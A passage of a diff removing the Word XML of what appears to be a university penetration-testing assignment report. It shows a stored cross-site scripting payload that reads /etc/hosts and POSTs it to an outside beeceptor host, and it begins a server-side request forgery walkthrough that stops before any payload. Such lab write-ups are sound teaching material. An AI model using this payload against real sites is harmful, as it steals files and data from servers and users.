-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="7" name="Picture 7"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="7" name="Picture 7"/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId19"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="1702664" cy="778635"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="right"/>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Proof_of_Concept_1" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:eastAsia="zh-CN"/>
-          </w:rPr>
-          <w:t>Return to the main report</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="52" w:name="_Exploitation_2"/>
-      <w:bookmarkEnd w:id="52"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>E</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>xploitation 2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>T</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>he following step shows how stored cross-site</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> scripting can be exploited to fetch a file from the filesystem.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="TableGrid"/>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="786"/>
-        <w:gridCol w:w="4657"/>
-        <w:gridCol w:w="3576"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="846" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>S</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>tep</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="5166" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>P</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ayload</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3007" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>E</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xplanation</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="846" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>1</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="5166" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>!--</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xxs_2.html --&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.onload</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = function () {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.send("test=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>("GET", "/etc/hosts");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;/script&gt;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3007" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Su</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>bmitting this payload as an anonymous question gives the following response:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C7EAE4" wp14:editId="57F0A1CF">
-                  <wp:extent cx="2128157" cy="1101812"/>
-                  <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
-                  <wp:docPr id="8" name="Picture 8"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId20"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="2128157" cy="1101812"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="53" w:name="_Section_3_–"/>
-      <w:bookmarkEnd w:id="53"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>S</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>ection 3 – Server-side request forgery exploitation walkthrough</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>The</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>f</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ollowing step shows using the server-side request forgery to get the background checks information in form of the flag. Each payload is placed at the end of </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId21" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:eastAsia="zh-CN"/>
-          </w:rPr>
-          <w:t>http://assignment-hermes.unimelb.life/validate.php?web=</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> .</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="TableGrid"/>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="659"/>
-        <w:gridCol w:w="4683"/>
-        <w:gridCol w:w="3677"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="659" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>S</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>tep</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4581" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>P</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ayload</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3779" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>E</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xplanation</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="659" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
